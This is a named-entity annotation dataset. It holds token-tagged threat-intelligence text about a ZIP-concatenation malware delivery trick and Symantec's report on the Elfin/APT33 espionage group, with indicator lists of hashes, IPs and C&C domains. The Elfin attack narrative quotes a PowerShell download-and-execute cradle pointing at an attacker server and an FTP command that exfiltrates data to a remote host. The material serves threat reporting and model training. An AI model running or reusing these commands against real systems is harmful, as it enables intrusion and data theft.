+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+. O
+
+The O
+latest O
+versions O
+of O
+PowerArchiver B-TOOL
+2019 E-TOOL
+and O
+WinRar S-TOOL
+displayed O
+in O
+their O
+respective O
+UI O
+the O
+executable O
+SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE
+as O
+the O
+only O
+content O
+of O
+the O
+ZIP O
+attachment
+. O
+
+No O
+error O
+or O
+warning O
+was O
+prompted O
+during O
+the O
+extraction
+. O
+
+Older O
+versions O
+of O
+7Zip S-TOOL
+also O
+behave O
+like O
+PowerArchiver S-TOOL
+and O
+WinRAR S-TOOL
+. O
+7Zip S-TOOL
+version O
+9.22 O
+and O
+older O
+saw O
+the O
+executable O
+as O
+well
+. O
+
+However, O
+starting O
+from O
+7Zip S-TOOL
+version O
+9.34 O
+(next O
+available O
+installer O
+after O
+version O
+9.22) O
+up O
+to O
+its O
+latest O
+version O
+19.0, O
+7zip S-TOOL
+saw O
+and O
+was O
+able O
+to O
+extract O
+the O
+image O
+file O
+order.jpg S-FILE
+instead
+. O
+
+The O
+second O
+ZIP O
+structure O
+was O
+treated O
+as O
+extra O
+data; O
+hence, O
+a O
+warning O
+was O
+added O
+to O
+the O
+extracted O
+image O
+file’s O
+properties
+. O
+
+Among O
+the O
+archiving O
+tools O
+we O
+tried, O
+WinRar S-TOOL
+3.30 O
+behaved O
+differently O
+and O
+unexpectedly
+. O
+
+The O
+content O
+of O
+the O
+ZIP O
+attachment O
+it O
+displayed O
+in O
+its O
+UI O
+was O
+not O
+the O
+one O
+it O
+extracted! O
+This O
+sample O
+challenges O
+gateways O
+scanners
+. O
+
+Depending O
+on O
+the O
+type O
+of O
+decompression O
+engine O
+used, O
+there O
+is O
+a O
+good O
+probability O
+that O
+only O
+the O
+decoy O
+file O
+may O
+be O
+scrutinized O
+and O
+vetted, O
+and O
+the O
+malicious O
+content O
+unnoticed O
+– O
+just O
+like O
+how O
+some O
+of O
+the O
+most O
+popular O
+archiving O
+tools O
+failed O
+to O
+notice O
+the O
+second O
+ZIP O
+structure
+. O
+
+Despite O
+what O
+the O
+gateway O
+does, O
+this O
+attack O
+would O
+only O
+succeed O
+if O
+the O
+message O
+got O
+through O
+the O
+gateway O
+and O
+a O
+particular O
+archive O
+utility O
+is O
+used O
+by O
+the O
+end-user, O
+such O
+as O
+certain O
+versions O
+of O
+PowerArchiver S-TOOL
+, O
+WinRar S-TOOL
+, O
+and O
+older O
+7Zip S-TOOL
+as O
+described O
+above
+. O
+
+In O
+this O
+case, O
+the O
+Trustwave O
+Secure O
+email S-TOOL
+Gateway O
+flagged O
+the O
+message O
+as O
+suspicious O
+and O
+it O
+did O
+not O
+get O
+through
+. O
+
+Nevertheless, O
+this O
+case O
+does O
+highlight O
+the O
+types O
+of O
+tricks O
+the O
+bad O
+guys O
+are O
+using O
+in O
+an O
+attempt O
+to O
+deliver O
+malware O
+through O
+email
+. O
+
+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+: O
+9474e1517c98d4165300a49612888d16643efbf6 S-SHA1
+. O
+
+
+Elfin S-APT
+: O
+Relentless O
+Espionage O
+Group O
+Targets O
+Multiple O
+Organizations O
+in O
+Saudi B-LOC
+Arabia E-LOC
+and O
+U.S S-LOC
+. O
+
+The O
+Elfin S-APT
+espionage O
+group O
+( O
+aka O
+APT33 S-APT
+) O
+has O
+remained O
+highly O
+active O
+over O
+the O
+past O
+three O
+years O
+, O
+attacking O
+at O
+least O
+50 O
+organizations O
+in O
+Saudi B-LOC
+Arabia E-LOC
+, O
+the O
+United B-LOC
+States E-LOC
+, O
+and O
+a O
+range O
+of O
+other O
+countries O
+. O
+
+The O
+group O
+, O
+which O
+first O
+became O
+active O
+in O
+late O
+2015 S-TIME
+or O
+early O
+2016 S-TIME
+, O
+specializes O
+in O
+scanning O
+for O
+vulnerable O
+websites O
+and O
+using O
+this O
+to O
+identify O
+potential O
+targets O
+, O
+either O
+for O
+attacks O
+or O
+creation O
+of O
+command O
+and O
+control O
+( O
+C&C O
+) O
+infrastructure O
+. O
+
+It O
+has O
+compromised O
+a O
+wide O
+range O
+of O
+targets O
+, O
+including O
+governments S-IDTY
+along O
+with O
+organizations O
+in O
+the O
+research O
+, O
+chemical O
+, O
+engineering O
+, O
+manufacturing O
+, O
+consulting O
+, O
+finance O
+, O
+telecoms O
+, O
+and O
+several O
+other O
+sectors O
+. O
+
+Elfin S-APT
+continues O
+to O
+be O
+focused O
+heavily O
+on O
+Saudi B-LOC
+Arabia E-LOC
+, O
+which O
+accounted O
+for O
+42 O
+percent O
+of O
+attacks O
+observed O
+by O
+Symantec S-SECTEAM
+since O
+the O
+beginning O
+of O
+2016 S-TIME
+. O
+
+However O
+, O
+the O
+U.S. S-LOC
+has O
+also O
+been O
+a O
+country O
+of O
+significant O
+interest O
+to O
+the O
+group O
+, O
+with O
+18 O
+organizations O
+attacked O
+over O
+the O
+past O
+three O
+years O
+, O
+including O
+a O
+number O
+of O
+Fortune O
+500 O
+companies O
+. O
+
+Elfin S-APT
+targets O
+in O
+the O
+U.S. S-LOC
+have O
+included O
+organizations O
+in O
+the O
+engineering O
+, O
+chemical O
+, O
+research O
+, O
+energy O
+consultancy O
+, O
+finance O
+, O
+IT O
+, O
+and O
+healthcare O
+sectors O
+. O
+
+Some O
+of O
+these O
+U.S. S-LOC
+organizations O
+may O
+have O
+been O
+targeted O
+by O
+Elfin S-APT
+for O
+the O
+purpose O
+of O
+mounting O
+supply O
+chain O
+attacks O
+. O
+
+In O
+one O
+instance O
+, O
+a O
+large O
+U.S. S-LOC
+company O
+was O
+attacked O
+in O
+the O
+same O
+month O
+a O
+Middle B-LOC
+Eastern E-LOC
+company O
+it O
+co-owns O
+was O
+also O
+compromised O
+. O
+
+In O
+a O
+recent O
+wave O
+of O
+attacks O
+during O
+February B-TIME
+2019 E-TIME
+, O
+Elfin S-APT
+attempted O
+to O
+exploit O
+a O
+known O
+vulnerability O
+( O
+CVE-2018-20250 S-VULID
+) O
+in O
+WinRAR S-TOOL
+, O
+the O
+widely O
+used O
+file O
+archiving O
+and O
+compression O
+utility O
+capable O
+of O
+creating O
+self-extracting O
+archive O
+files O
+. O
+
+The O
+exploit O
+was O
+used O
+against O
+one O
+target O
+in O
+the O
+chemical O
+sector O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+
+If O
+successfully O
+exploited O
+on O
+an O
+unpatched O
+computer O
+, O
+the O
+vulnerability O
+could O
+permit O
+an O
+attacker O
+to O
+install O
+any O
+file O
+on O
+the O
+computer O
+, O
+which O
+effectively O
+permits O
+code O
+execution O
+on O
+the O
+targeted O
+computer O
+. O
+
+Two O
+users O
+in O
+the O
+targeted O
+organization O
+received O
+a O
+file O
+called O
+" O
+JobDetails.rar S-FILE
+" O
+, O
+which O
+attempted O
+to O
+exploit O
+the O
+WinRAR S-TOOL
+vulnerability O
+. O
+
+This O
+file O
+was O
+likely O
+delivered O
+via O
+a O
+spear-phishing B-ACT
+email E-ACT
+. O
+
+However O
+, O
+prior O
+to O
+this O
+attempted O
+attack O
+, O
+Symantec S-SECTEAM
+had O
+rolled O
+out O
+proactive O
+protection O
+against O
+any O
+attempt O
+to O
+exploit O
+this O
+vulnerability O
+( O
+Exp.CVE-2018-20250 S-VULID
+) O
+. O
+
+This O
+protection O
+successfully O
+protected O
+the O
+targeted O
+organization O
+from O
+being O
+compromised O
+. O
+
+Elfin S-APT
+came O
+under O
+the O
+spotlight O
+in O
+December B-TIME
+2018 E-TIME
+when O
+it O
+was O
+linked O
+with O
+a O
+new O
+wave O
+of O
+Shamoon S-APT
+attacks O
+. O
+
+One O
+Shamoon S-APT
+victim O
+in O
+Saudi B-LOC
+Arabia E-LOC
+had O
+recently O
+also O
+been O
+attacked O
+by O
+Elfin S-APT
+and O
+had O
+been O
+infected O
+with O
+the O
+Stonedrill S-MAL
+malware O
+( O
+Trojan.Stonedrill S-MAL
+) O
+used O
+by O
+Elfin S-APT
+. O
+
+Because O
+the O
+Elfin S-APT
+and O
+the O
+Shamoon S-APT
+attacks O
+against O
+this O
+organization O
+occurred O
+so O
+close O
+together O
+, O
+there O
+has O
+been O
+speculation O
+that O
+the O
+two O
+groups O
+may O
+be O
+linked O
+. O
+
+However O
+, O
+Symantec S-SECTEAM
+has O
+found O
+no O
+further O
+evidence O
+to O
+suggest O
+Elfin S-APT
+was O
+responsible O
+for O
+these O
+Shamoon S-APT
+attacks O
+to O
+date O
+. O
+
+We O
+continue O
+to O
+monitor O
+the O
+activities O
+of O
+both O
+groups O
+closely O
+. O
+
+Elfin S-APT
+has O
+deployed O
+a O
+wide O
+range O
+of O
+tools O
+in O
+its O
+attacks O
+including O
+custom O
+malware O
+, O
+commodity O
+malware O
+, O
+and O
+open-source O
+hacking O
+tools O
+. O
+
+Custom O
+malware O
+used O
+by O
+the O
+group O
+include O
+: O
+
+Notestuk S-MAL
+( O
+Backdoor.Notestuk S-MAL
+) O
+( O
+aka O
+TURNEDUP S-MAL
+) O
+: O
+Malware O
+that O
+can O
+be O
+used O
+to O
+open O
+a O
+backdoor O
+and O
+gather O
+information O
+from O
+a O
+compromised O
+computer O
+. O
+
+Stonedrill S-MAL
+( O
+Trojan.Stonedrill S-MAL
+) O
+: O
+Custom O
+malware O
+capable O
+of O
+opening O
+a O
+backdoor O
+on O
+an O
+infected O
+computer O
+and O
+downloading O
+additional O
+files O
+. O
+
+The O
+malware O
+also O
+features O
+a O
+destructive O
+component O
+, O
+which O
+can O
+wipe O
+the O
+master O
+boot O
+record O
+of O
+an O
+infected O
+computer O
+. O
+
+AutoIt B-MAL
+backdoor E-MAL
+: O
+A O
+custom O
+built O
+backdoor O
+written O
+in O
+the O
+AutoIt O
+scripting O
+language O
+. O
+
+In O
+addition O
+to O
+its O
+custom O
+malware O
+, O
+Elfin S-APT
+has O
+also O
+used O
+a O
+number O
+of O
+commodity O
+malware O
+tools O
+, O
+available O
+for O
+purchase O
+on O
+the O
+cyber O
+underground O
+. O
+
+These O
+include O
+: O
+
+Remcos S-MAL
+( O
+Backdoor.Remvio S-MAL
+) O
+: O
+A O
+commodity O
+remote O
+administration O
+tool O
+( O
+RAT O
+) O
+that O
+can O
+be O
+used O
+to O
+steal O
+information O
+from O
+an O
+infected O
+computer O
+. O
+
+DarkComet S-MAL
+( O
+Backdoor.Breut S-MAL
+) O
+: O
+Another O
+commodity O
+RAT O
+used O
+to O
+open O
+a O
+backdoor O
+on O
+an O
+infected O
+computer O
+and O
+steal O
+information O
+. O
+
+Quasar B-MAL
+RAT E-MAL
+( O
+Trojan.Quasar S-MAL
+) O
+: O
+Commodity O
+RAT O
+that O
+can O
+be O
+used O
+to O
+steal O
+passwords O
+and O
+execute O
+commands O
+on O
+an O
+infected O
+computer O
+. O
+
+Pupy B-MAL
+RAT E-MAL
+( O
+Backdoor.Patpoopy S-MAL
+) O
+: O
+Commodity O
+RAT O
+that O
+can O
+open O
+a O
+backdoor O
+on O
+an O
+infected O
+computer O
+. O
+
+NanoCore S-MAL
+( O
+Trojan.Nancrat S-MAL
+) O
+: O
+Commodity O
+RAT O
+used O
+to O
+open O
+a O
+backdoor O
+on O
+an O
+infected O
+computer O
+and O
+steal O
+information O
+. O
+
+NetWeird S-MAL
+( O
+Trojan.Netweird.B S-MAL
+) O
+: O
+A O
+commodity O
+Trojan S-MAL
+which O
+can O
+open O
+a O
+backdoor O
+and O
+steal O
+information O
+from O
+the O
+compromised O
+computer O
+. O
+
+It O
+may O
+also O
+download O
+additional O
+potentially O
+malicious O
+files O
+. O
+
+Elfin S-APT
+also O
+makes O
+frequent O
+use O
+of O
+a O
+number O
+of O
+publicly O
+available O
+hacking O
+tools O
+, O
+including O
+: O
+
+LaZagne S-MAL
+( O
+SecurityRisk.LaZagne S-MAL
+) O
+: O
+A O
+login/password O
+retrieval O
+tool O
+. O
+
+Mimikatz S-MAL
+( O
+Hacktool.Mimikatz S-MAL
+) O
+: O
+Tool O
+designed O
+to O
+steal O
+credentials O
+. O
+
+Gpppassword S-MAL
+: O
+Tool O
+used O
+to O
+obtain O
+and O
+decrypt O
+Group O
+Policy O
+Preferences O
+( O
+GPP O
+) O
+passwords O
+. O
+
+SniffPass S-MAL
+( O
+SniffPass S-MAL
+) O
+: O
+Tool O
+designed O
+to O
+steal O
+passwords O
+by O
+sniffing O
+network O
+traffic O
+. O
+
+In O
+this O
+section O
+, O
+we O
+describe O
+in O
+detail O
+an O
+Elfin S-APT
+attack O
+on O
+a O
+U.S. S-LOC
+organization O
+. O
+
+On O
+February B-TIME
+12 I-TIME
+, I-TIME
+2018 I-TIME
+at I-TIME
+16:45 E-TIME
+( O
+all O
+times O
+are O
+in O
+the O
+organization’s O
+local O
+time O
+) O
+, O
+an O
+email S-TOOL
+was O
+sent O
+to O
+the O
+organization O
+advertising O
+a O
+job O
+vacancy O
+at O
+an O
+American S-LOC
+global O
+service O
+provider O
+. O
+
+The O
+email S-TOOL
+contained O
+a O
+malicious O
+link O
+to O
+http://mynetwork.ddns.net:880 S-URL
+. O
+
+The O
+recipient O
+clicked O
+the O
+link O
+and O
+proceeded O
+to O
+download O
+and O
+open O
+a O
+malicious O
+HTML O
+executable O
+file O
+, O
+which O
+in O
+turn O
+loaded O
+content O
+from O
+a O
+C&C O
+server O
+via O
+an O
+embedded O
+iframe O
+. O
+
+At O
+the O
+same O
+time O
+, O
+code O
+embedded O
+within O
+this O
+file O
+also O
+executed O
+a O
+powershell S-TOOL
+command O
+to O
+download O
+and O
+execute O
+a O
+copy O
+of O
+chfeeds.vbe S-FILE
+from O
+the O
+C&C B-TOOL
+server E-TOOL
+. O
+[System.Net.ServicePointManager] O
+: O
+:S O
+erverCertificateValidationCallback={$true};IEX O
+(New-Object O
+Net.WebClient O
+) O
+.DownloadString O
+( O
+' O
+https://217.147.168.46:8088/index.jpg S-URL
+' O
+) O
+. O
+
+A O
+second O
+JavaScript O
+command O
+was O
+also O
+executed O
+, O
+which O
+created O
+a O
+scheduled O
+task O
+to O
+execute O
+chfeeds.vbe S-FILE
+multiple O
+times O
+a O
+day O
+. O
+
+The O
+chfeeds.vbe S-FILE
+file O
+acts O
+as O
+a O
+downloader O
+and O
+was O
+used O
+to O
+download O
+a O
+second O
+powershell S-TOOL
+script O
+( O
+registry.ps1 S-FILE
+) O
+. O
+
+This O
+script O
+in O
+turn O
+downloaded O
+and O
+executed O
+a O
+PowerShell B-MAL
+backdoor E-MAL
+known O
+as O
+POSHC2 S-MAL
+, O
+a O
+proxy-aware B-TOOL
+C&C I-TOOL
+framework E-TOOL
+, O
+from O
+the O
+C&C O
+server O
+( O
+https:// B-URL
+host-manager.hopto.org E-URL
+) O
+. O
+
+Later O
+at O
+20:57 S-TIME
+, O
+the O
+attackers O
+became O
+active O
+on O
+the O
+compromised O
+machine O
+and O
+proceeded O
+to O
+download O
+the O
+archiving O
+tool O
+WinRAR S-TOOL
+. O
+89.34.237.118 B-IP
+808 E-IP
+http://89.34.237.118:808/Rar32.exe S-URL
+. O
+
+At O
+23:29 S-TIME
+, O
+the O
+attackers O
+then O
+proceeded O
+to O
+deploy O
+an O
+updated O
+version O
+of O
+their O
+POSHC2 S-MAL
+stager O
+. O
+192.119.15.35 B-IP
+880 E-IP
+http://mynetwork.ddns.net:880/st-36-p4578.ps1 S-URL
+. O
+
+This O
+tool O
+was O
+downloaded O
+several O
+times O
+between O
+23:29 B-TIME
+on I-TIME
+February I-TIME
+12 E-TIME
+and O
+07:47 B-TIME
+on I-TIME
+February I-TIME
+13 E-TIME
+. O
+
+Two O
+days O
+later O
+, O
+on O
+February B-TIME
+14 I-TIME
+at I-TIME
+15:12 E-TIME
+, O
+the O
+attackers O
+returned O
+and O
+installed O
+Quasar B-MAL
+RAT E-MAL
+onto O
+the O
+infected O
+computer O
+that O
+communicated O
+with O
+a O
+C&C O
+server O
+( O
+217.147.168.123 S-IP
+) O
+. O
+
+Quasar B-MAL
+RAT E-MAL
+was O
+installed O
+to O
+CSIDL_PROFILE\appdata\roaming\microsoft\crypto\smss.exe S-FILE
+. O
+
+At O
+this O
+point O
+, O
+the O
+attackers O
+ceased O
+activity O
+while O
+maintaining O
+access O
+to O
+the O
+network O
+until O
+February B-TIME
+21 E-TIME
+. O
+
+At O
+06:38 S-TIME
+, O
+the O
+attackers O
+were O
+observed O
+downloading O
+a O
+custom O
+.NET B-MAL
+FTP E-MAL
+tool O
+to O
+the O
+infected O
+computer O
+. O
+192.119.15.36 B-IP
+880 E-IP
+http://192.119.15.36:880/ftp.exe S-URL
+. O
+
+Later O
+at O
+6:56 S-TIME
+, O
+the O
+attackers O
+exfiltrated O
+data O
+using O
+this O
+FTP S-TOOL
+tool O
+to O
+a O
+remote O
+host: O
+JsuObf.exe S-FILE
+Nup#Tntcommand O
+-s O
+CSIDL_PROFILE\appdata\roaming\adobe\rar O
+-a O
+ftp://89.34.237.118:2020 O
+-f/[REDACTED]-u[REDACTED]-p[REDACTED] O
+. O
+
+Activity O
+ceased O
+until O
+the O
+attackers O
+returned O
+on O
+March B-TIME
+5 E-TIME
+and O
+were O
+observed O
+using O
+Quasar B-MAL
+RAT E-MAL
+to O
+download O
+a O
+second O
+custom O
+AutoIt B-MAL
+FTP E-MAL
+Exfiltration S-ACT
+tool O
+known O
+as O
+FastUploader S-MAL
+from O
+http://192.119.15.36:880/ftp.exe S-URL
+. O
+
+This O
+tool O
+was O
+then O
+installed O
+to O
+csidl_profile\appdata\roaming\adobe\ftp.exe S-FILE
+. O
+
+FastUploader S-MAL
+is O
+a O
+custom O
+FTP S-TOOL
+tool O
+designed O
+to O
+exfiltrate O
+data O
+at O
+a O
+faster O
+rate O
+than O
+traditional O
+FTP S-TOOL
+clients O
+. O
+
+At O
+this O
+point O
+, O
+additional O
+activity O
+from O
+the O
+attackers O
+continued O
+between O
+March B-TIME
+5 E-TIME
+into O
+April S-TIME
+, O
+and O
+on O
+April B-TIME
+18 I-TIME
+at I-TIME
+11:50 E-TIME
+, O
+a O
+second O
+remote O
+access O
+tool O
+known O
+as O
+DarkComet S-MAL
+was O
+deployed O
+to O
+csidl_profile\appdata\roaming\microsoft\windows\start O
+menu\programs\startup\smss.exe S-FILE
+on O
+the O
+infected O
+computer O
+. O
+
+This O
+was O
+quickly O
+followed O
+15 O
+seconds O
+later O
+by O
+the O
+installation O
+of O
+a O
+credential O
+dumping O
+to O
+csidl_profile\appdata\roaming\microsoft\credentials\dwm32.exe S-FILE
+, O
+and O
+the O
+execution O
+of O
+powershell S-TOOL
+commands O
+via O
+PowerShell B-TOOL
+Empire E-TOOL
+, O
+a O
+freely O
+available O
+post-exploitation O
+framework O
+, O
+to O
+bypass O
+logging O
+on O
+the O
+infected O
+machine O
+. O
+
+Activity O
+continued O
+throughout O
+April S-TIME
+where O
+additional O
+versions O
+of O
+DarkComet S-MAL
+, O
+POSHC2 S-MAL
+implants O
+, O
+and O
+an O
+AutoIt B-MAL
+backdoor E-MAL
+were O
+deployed O
+along O
+with O
+further O
+credential O
+dumping O
+activities O
+. O
+
+Elfin S-APT
+is O
+one O
+of O
+the O
+most O
+active O
+groups O
+currently O
+operating O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+targeting O
+a O
+large O
+number O
+of O
+organizations O
+across O
+a O
+diverse O
+range O
+of O
+sectors O
+. O
+
+Over O
+the O
+past O
+three O
+years O
+, O
+the O
+group O
+has O
+utilized O
+a O
+wide O
+array O
+of O
+tools O
+against O
+its O
+victims O
+, O
+ranging O
+from O
+custom O
+built O
+malware O
+to O
+off-the-shelf O
+RATs O
+, O
+indicating O
+a O
+willingness O
+to O
+continually O
+revise O
+its O
+tactics O
+and O
+find O
+whatever O
+tools O
+it O
+takes O
+to O
+compromise O
+its O
+next O
+set O
+of O
+victims O
+. O
+
+Symantec O
+has O
+the O
+following O
+protection O
+in O
+place O
+to O
+protect O
+customers O
+against O
+these O
+attacks O
+, O
+APT33 S-APT
+: O
+Backdoor.Notestuk S-MAL
+Trojan.Stonedrill S-MAL
+Backdoor.Remvio S-MAL
+Backdoor.Breut S-MAL
+Trojan.Quasar S-MAL
+Backdoor.Patpoopy S-MAL
+Trojan.Nancrat S-MAL
+Trojan.Netweird.B S-MAL
+Exp.CVE-2018-20250 S-VULID
+SecurityRisk.LaZagne S-MAL
+Hacktool.Mimikatz S-MAL
+SniffPass S-MAL
+. O
+
+APT33 S-APT
+: O
+5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2	Notestuk/TURNEDUP S-MAL
+. O
+
+APT33 S-APT
+: O
+a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2	AutoIt B-MAL
+backdoor E-MAL
+. O
+
+APT33 S-APT
+: O
+f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2	Gpppassword S-MAL
+. O
+
+APT33 S-APT
+: O
+87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2	LaZagne S-MAL
+. O
+
+APT33 S-APT
+: O
+709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 S-SHA2	LaZagne S-MAL
+. O
+
+APT33 S-APT
+: O
+a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2	Quasar B-MAL
+RAT E-MAL
+. O
+
+APT33 S-APT
+: O
+0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2	Quasar B-MAL
+RAT E-MAL
+. O
+
+APT33 S-APT
+: O
+d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2	Quasar B-MAL
+RAT E-MAL
+. O
+
+APT33 S-APT
+: O
+ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2	Remcos S-MAL
+. O
+
+APT33 S-APT
+: O
+e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2	Remcos S-MAL
+. O
+
+APT33 S-APT
+: O
+018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2	Remcos S-MAL
+. O
+
+APT33 S-APT
+: O
+367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2	Remcos S-MAL
+. O
+
+APT33 S-APT
+: O
+ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2	Remcos S-MAL
+. O
+
+APT33 S-APT
+: O
+6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2	SniffPass S-MAL
+. O
+
+APT33 S-APT
+: O
+bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2	DarkComet S-MAL
+. O
+
+APT33 S-APT
+: O
+af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2	DarkComet S-MAL
+. O
+
+APT33 S-APT
+: O
+c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2	AutoIt B-MAL
+FTP E-MAL
+tool O
+. O
+
+APT33 S-APT
+: O
+99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2	.NET B-MAL
+FTP E-MAL
+tool O
+. O
+
+APT33 S-APT
+: O
+94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2	PowerShell B-MAL
+downloader E-MAL
+( O
+registry.ps1 S-MAL
+) O
+. O
+
+APT33 S-APT
+: O
+dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2	POSHC2 B-MAL
+backdoor E-MAL
+. O
+
+APT33 S-APT
+: O
+95.211.191.117 S-IP
+update-sec.com S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.120 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+162.250.145.234 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+91.235.142.76 S-IP
+mywinnetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.119 S-IP
+hyperservice.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.120 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+213.252.244.14 S-IP
+service-avant.com S-DOM
+. O
+
+APT33 S-APT
+: O
+91.235.142.124 S-IP
+mywinnetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.120 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+162.250.145.234 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+91.235.142.76 S-IP
+mywinnetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.120 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.120 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+95.211.191.117 S-IP
+update-sec.com S-DOM
+. O
+
+APT33 S-APT
+: O
+5.187.21.70 S-IP
+microsoftupdated.com S-DOM
+. O
+
+APT33 S-APT
+: O
+217.13.103.46 S-IP
+securityupdated.com S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.120 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+5.187.21.71 S-IP
+backupnet.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+91.230.121.143 S-IP
+backupnet.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.119 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.117 S-IP
+srvhost.servehttp.com S-DOM
+. O
+
+APT33 S-APT
+: O
+37.48.105.178 S-IP
+servhost.hopto.org S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.117 S-IP
+srvhost.servehttp.com S-DOM
+. O
+
+APT33 S-APT
+: O
+5.187.21.70 S-DOM
+microsoftupdated.com S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.214 S-DOM
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.217 S-DOM
+[REDACTED].servehttp.com S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.214 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.214 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.214 S-IP
+[REDACTED].sytes.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.217 S-IP
+[REDACTED].myftp.org S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.216 S-IP
+srvhost.servehttp.com S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.217 S-IP
+[REDACTED].myftp.org S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.217 S-IP
+[REDACTED].myftp.org S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.215 S-IP
+[REDACTED].myftp.org S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.217 S-IP
+[REDACTED].myftp.org S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.216 S-IP
+[REDACTED].myftp.org S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.232 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.214 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+162.250.145.204 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+188.165.4.81 S-IP
+svcexplores.com S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.231 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.231 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.232 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.216 S-IP
+[REDACTED].myftp.biz S-DOM
+. O
+
+APT33 S-APT
+: O
+91.230.121.143 S-IP
+remote-server.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+162.250.145.222 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+64.251.19.216 S-IP
+[REDACTED].redirectme.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.222 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.223 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+217.147.168.44 S-IP
+remserver.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+195.20.52.172 S-IP
+mynetwork.cf S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.221 S-IP
+mynetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.220 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+8.26.21.221 S-IP
+[REDACTED].ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+91.230.121.144 S-IP
+remserver.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+89.34.237.118 S-IP
+mywinnetwork.ddns.net S-DOM
+. O
+
+APT33 S-APT
+: O
+192.119.15.35 S-IP
